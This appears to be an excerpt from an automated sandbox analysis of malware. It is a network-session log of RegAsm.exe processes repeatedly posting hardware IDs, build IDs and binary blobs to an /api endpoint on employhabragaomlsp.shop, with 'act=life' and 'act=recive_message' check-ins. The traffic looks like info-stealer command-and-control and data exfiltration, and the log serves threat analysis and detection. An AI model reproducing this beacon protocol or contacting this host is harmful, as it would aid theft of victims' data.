2024-05-23 22:22:07 UTC	289	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15100 Host: employhabragaomlsp.shop
2024-05-23 22:22:07 UTC	15100	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 45 44 41 32 37 43 34 37 34 33 45 41 31 45 37 33 39 44 44 39 35 35 36 44 41 41 39 35 41 34 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 0d 0a 2d 2d 62 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"8EDA27C4743EA1E739DD9556DAA95A41--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl----b
2024-05-23 22:22:08 UTC	812	IN	HTTP/1.1 200 OK Date: Thu, 23 May 2024 22:22:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=i62u2vnvqi7qd624jpbna1fu2q; expires=Mon, 16-Sep-2024 16:08:46 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4RDLr5xctBb178Xtei7zUtsnf91URYT0tVM4LSCrADLIClj8nf%2BMLOsS8QWaZut1TMyNYnERHX%2FWd%2BZbkoVs4dn2eTOhNCmJx1dbsJPAdrmFtxlmfRVGrsSs853jSOYbZdLSouj8GuGzoA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 888871605f4418ea-EWR alt-svc: h3=":443"; ma=86400
2024-05-23 22:22:08 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 0d 0a Data Ascii: fok 8.46.123.175
2024-05-23 22:22:08 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.6	49726	188.114.96.3	443	6472	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 22:22:10 UTC	289	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 19958 Host: employhabragaomlsp.shop
2024-05-23 22:22:10 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 45 44 41 32 37 43 34 37 34 33 45 41 31 45 37 33 39 44 44 39 35 35 36 44 41 41 39 35 41 34 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 0d 0a 2d 2d 62 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"8EDA27C4743EA1E739DD9556DAA95A41--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl----b
2024-05-23 22:22:10 UTC	4627	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8b 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 b1 e8 ef fa 6f c5 82 3f 0c fe 4d 70 35 98 09 ee b9 f1 d3 1b 7f 70 e3 5f de a8 de f8 f4 8d d8 f5 Data Ascii: +?2+?2+?o?Mp5p_
2024-05-23 22:22:14 UTC	822	IN	HTTP/1.1 200 OK Date: Thu, 23 May 2024 22:22:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=3j6qh7a820r273b51nnljsgvuk; expires=Mon, 16-Sep-2024 16:08:49 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JXvTed%2FAO1ZjxUV9Dj%2BlkxUrRdC1R5i%2Fsa2%2BxU3mkp4k7ReLGHi0lXorbwKHKLcyX0Tf4kukH7bdNRJNrUGTTXeBi%2FYSha6%2Bu1IM9D4bY%2FhjeYpPVwX%2BZXTZFcSQYzSpgPzfIAjInzscTw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 888871720d4317e1-EWR alt-svc: h3=":443"; ma=86400
2024-05-23 22:22:14 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 0d 0a Data Ascii: fok 8.46.123.175
2024-05-23 22:22:14 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.6	49729	188.114.96.3	443	500	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 22:22:10 UTC	289	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15100 Host: employhabragaomlsp.shop
2024-05-23 22:22:10 UTC	15100	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 45 44 41 32 37 43 34 37 34 33 45 41 31 45 37 33 39 44 44 39 35 35 36 44 41 41 39 35 41 34 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 0d 0a 2d 2d 62 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"8EDA27C4743EA1E739DD9556DAA95A41--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl----b
2024-05-23 22:22:10 UTC	816	IN	HTTP/1.1 200 OK Date: Thu, 23 May 2024 22:22:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=vvrk0i99613okfurpffos54eqs; expires=Mon, 16-Sep-2024 16:08:49 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4O2Ix71tuDOp3w0ypYfM2xmVTwH205eIcpoZV8rrfH3F%2F%2FH8HBIRpIMdh9ubFvLxNTpiXiWjECH%2FF%2FeqlEc0ZnfkvAcTnX0Ep23U0UpgN9ZbGFr7BL6AxPwxHYDguq%2BLbKc3iqHXp0QvLg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88887172887a42d5-EWR alt-svc: h3=":443"; ma=86400
2024-05-23 22:22:10 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 0d 0a Data Ascii: fok 8.46.123.175
2024-05-23 22:22:10 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.6	49732	188.114.96.3	443	500	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 22:22:11 UTC	289	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 19958 Host: employhabragaomlsp.shop
2024-05-23 22:22:11 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 45 44 41 32 37 43 34 37 34 33 45 41 31 45 37 33 39 44 44 39 35 35 36 44 41 41 39 35 41 34 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 0d 0a 2d 2d 62 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"8EDA27C4743EA1E739DD9556DAA95A41--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl----b
2024-05-23 22:22:11 UTC	4627	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8b 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 b1 e8 ef fa 6f c5 82 3f 0c fe 4d 70 35 98 09 ee b9 f1 d3 1b 7f 70 e3 5f de a8 de f8 f4 8d d8 f5 Data Ascii: +?2+?2+?o?Mp5p_
2024-05-23 22:22:11 UTC	814	IN	HTTP/1.1 200 OK Date: Thu, 23 May 2024 22:22:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=2fmn7b191h120m421c2jj2ao96; expires=Mon, 16-Sep-2024 16:08:50 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IfPQEO3si0%2B7tEZq6jukgxw4TRWeXRPB2A7T2%2FXLxAJEmQZOH36y2slE4MgXR7T3OnS9pzjlv6njKLnEENu2Pi%2BAOFrAdMI4l5J1fFbeno9d8nhU5TX9p0IiHGR6kgEHOvGEVrwLfgl8%2BA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8888717a4d478cb1-EWR alt-svc: h3=":443"; ma=86400
2024-05-23 22:22:11 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 0d 0a Data Ascii: fok 8.46.123.175
2024-05-23 22:22:11 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.6	49734	188.114.96.3	443	500	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 22:22:12 UTC	288	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 5429 Host: employhabragaomlsp.shop
2024-05-23 22:22:12 UTC	5429	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 45 44 41 32 37 43 34 37 34 33 45 41 31 45 37 33 39 44 44 39 35 35 36 44 41 41 39 35 41 34 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 0d 0a 2d 2d 62 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"8EDA27C4743EA1E739DD9556DAA95A41--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl----b
2024-05-23 22:22:14 UTC	816	IN	HTTP/1.1 200 OK Date: Thu, 23 May 2024 22:22:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=v42r77nmdjo9ce0bbhuns34de7; expires=Mon, 16-Sep-2024 16:08:52 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iOUmwm3Bk1%2B6brUvtsFdD7FghWTQy3JLCYaJRqvE%2B%2Bj1GKPLdhIln%2B6kQpMFtkOLeX0wEhO4BwIcpPpIiuP8L5IwjQ8xAFU8XMJ7hoJ8Yy3D6GANpIupGggJLP8gw2xMDEZs5p3PUp%2FDYQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 888871814cba7277-EWR alt-svc: h3=":443"; ma=86400
2024-05-23 22:22:14 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 0d 0a Data Ascii: fok 8.46.123.175
2024-05-23 22:22:14 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.6	49736	188.114.96.3	443	5920	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 22:22:14 UTC	270	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: employhabragaomlsp.shop
2024-05-23 22:22:14 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-05-23 22:22:14 UTC	806	IN	HTTP/1.1 200 OK Date: Thu, 23 May 2024 22:22:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=96dmsr7ae0nqpkashekh37m2l4; expires=Mon, 16-Sep-2024 16:08:53 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=v5IBcGHLZRI2hskIkv47YpBbcCWZFmfFYnkOyeWmY7pdRiEvT0MqkWFMBDgOWdYLPOoEGSnCDlWGuOb8cYP5jqATPxfsowgczTWZRBVhUktCcA5MnRIW2umgvobvS96XQhLdULYR8Recng%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8888718b4b18c34a-EWR alt-svc: h3=":443"; ma=86400
2024-05-23 22:22:14 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-05-23 22:22:14 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.6	49737	188.114.96.3	443	500	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 22:22:14 UTC	288	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1237 Host: employhabragaomlsp.shop
2024-05-23 22:22:14 UTC	1237	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 45 44 41 32 37 43 34 37 34 33 45 41 31 45 37 33 39 44 44 39 35 35 36 44 41 41 39 35 41 34 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 0d 0a 2d 2d 62 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"8EDA27C4743EA1E739DD9556DAA95A41--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl----b
2024-05-23 22:22:15 UTC	812	IN	HTTP/1.1 200 OK Date: Thu, 23 May 2024 22:22:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=9qu6m8464r2fju6q06k4ml3irf; expires=Mon, 16-Sep-2024 16:08:54 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Jofq6rgQTeLo3NYreuKVegkHz6OSqgrYqXBoZD0yL3efy9Bxnx4C56IqlejBRqmG5jt1%2BZR2suVHpJyW7ykhi36uyhBQIIdFr9zmDzLHofcSQVO%2FwnNny6pkpRSS3grECFN1f122%2FqCEDw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88887190199d8c7b-EWR alt-svc: h3=":443"; ma=86400
2024-05-23 22:22:15 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 0d 0a Data Ascii: fok 8.46.123.175
2024-05-23 22:22:15 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.6	49738	188.114.96.3	443	6472	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 22:22:15 UTC	288	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 5429 Host: employhabragaomlsp.shop
2024-05-23 22:22:15 UTC	5429	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 45 44 41 32 37 43 34 37 34 33 45 41 31 45 37 33 39 44 44 39 35 35 36 44 41 41 39 35 41 34 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 0d 0a 2d 2d 62 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"8EDA27C4743EA1E739DD9556DAA95A41--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl----b
2024-05-23 22:22:15 UTC	814	IN	HTTP/1.1 200 OK Date: Thu, 23 May 2024 22:22:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=8bnl4dgr9gl2lu92avklp8pql8; expires=Mon, 16-Sep-2024 16:08:54 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OBdJ9MbSlBpK1EwquvBnig8omJ2CpkXXSLMSc70q7JMHSo8%2FCrjMVNikmJrTOcfEH71cka%2FW5OF8wxE9U0aLhh8Z3FSGVNc3jL%2FteYUgnvBuhIg9Xamnnbccr%2FJZBEM4pxEYq3EjGURUug%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 888871915f7b8c7e-EWR alt-svc: h3=":443"; ma=86400
2024-05-23 22:22:15 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 0d 0a Data Ascii: fok 8.46.123.175
2024-05-23 22:22:15 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.6	49739	188.114.96.3	443	5920	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 22:22:15 UTC	271	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 49 Host: employhabragaomlsp.shop
2024-05-23 22:22:15 UTC	49	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 38 4e 67 43 6c 2d 2d 26 6a 3d 64 65 66 61 75 6c 74 Data Ascii: act=recive_message&ver=4.0&lid=H8NgCl--&j=default
